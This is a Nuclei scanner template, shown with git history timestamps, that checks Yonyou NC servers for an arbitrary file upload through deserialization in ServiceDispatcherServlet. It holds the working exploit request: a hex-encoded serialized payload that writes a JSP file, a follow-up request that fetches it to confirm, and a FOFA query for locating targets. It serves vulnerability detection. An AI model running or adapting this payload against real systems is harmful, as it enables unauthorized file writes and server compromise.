nuclei-templates/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileup...

37 lines
1.9 KiB
YAML
Raw Normal View History

2023-09-15 12:23:57 +00:00
id: yonyou-nc-dispatcher-fileupload
2023-08-18 03:22:06 +00:00
info:
2023-09-15 12:23:57 +00:00
name: Yonyou NC ServiceDispatcher Servlet - Arbitrary File Upload
2023-08-18 03:22:06 +00:00
author: SleepingBag945
severity: critical
2023-09-15 12:23:57 +00:00
description: |
Yonyou NC ServiceDispatcherServlet deserialization file upload vulnerability.
reference:
- https://github.com/lal0ne/vulnerability/blob/c0985107adfd91d85fbd76d9a8acf8fbfa98ed41/YonyouNC/ncDecode/README.md
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 2
fofa-query: icon_hash="1085941792"
2023-09-17 08:51:38 +00:00
tags: yonyou,intrusive,fileupload
2023-08-18 03:22:06 +00:00
http:
- raw:
- |
POST /ServiceDispatcherServlet HTTP/1.1
Content-Type: application/data
Host: {{Hostname}}
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
{{hex_decode("0000015C7271890390CEA362632F6E8819F73AC2FA807D6CAF41AE772EC2DF10A2AB43A4C7BAF2C7F57909B2C19D6CF5DE6E565331E70CB3C2E70A3AF6D1E3C4480035F870288D440C41742E3EC659DA538CC3CAA2AE86569D62D002D8CE52D7D184BE7556F95C7567C1AC40FDD7502AF38BAE48C14D6A4F473779542BD7D1072973C4CD093C6BC1D0266BE82F15EEB96D146BAF89297059448A2EDDDF63463984FFC2247032EAD18E03422B87A8CC01E651A50DD09A1DE3C87ED376B43366DE024EE3880B7006A56DF97073A7472B444FF53433DD0AE63758FEB43A808B49DA0CB5B23783C3DE07C5182D35CD467D9CA2081B47EB7F604E84A1B7DA7E665A2B5D6B04F94C838AF6AE6E4829304C2D750A0A1400860F9D7611BA8DEA77AE8C79AD44F90C55A74DD3D06D27B5F3A583E8C3FCC27FC8C9B660F0C3B52B76DB7B3A0B87D04FE98DF57D2851FD93F40D04A3DA14C658E5BCBD9DCB74E35AB50818EF")}}
- |
GET /ncupload/n2d19a.jsp HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "status_code_2 == 200 && contains(body_2,'just_a_test')"
2023-10-14 11:27:55 +00:00
condition: and
# digest: 4b0a00483046022100b133fa848f0dfa29959a4593e87849235eec2ba638a6b83ab7726c39748bb592022100b4ef8f4f815d5b12f118f5770b9b7dee0d102fa7942007358ba698c3ac5d932d:922c64590222798bb761d5b6d8e72950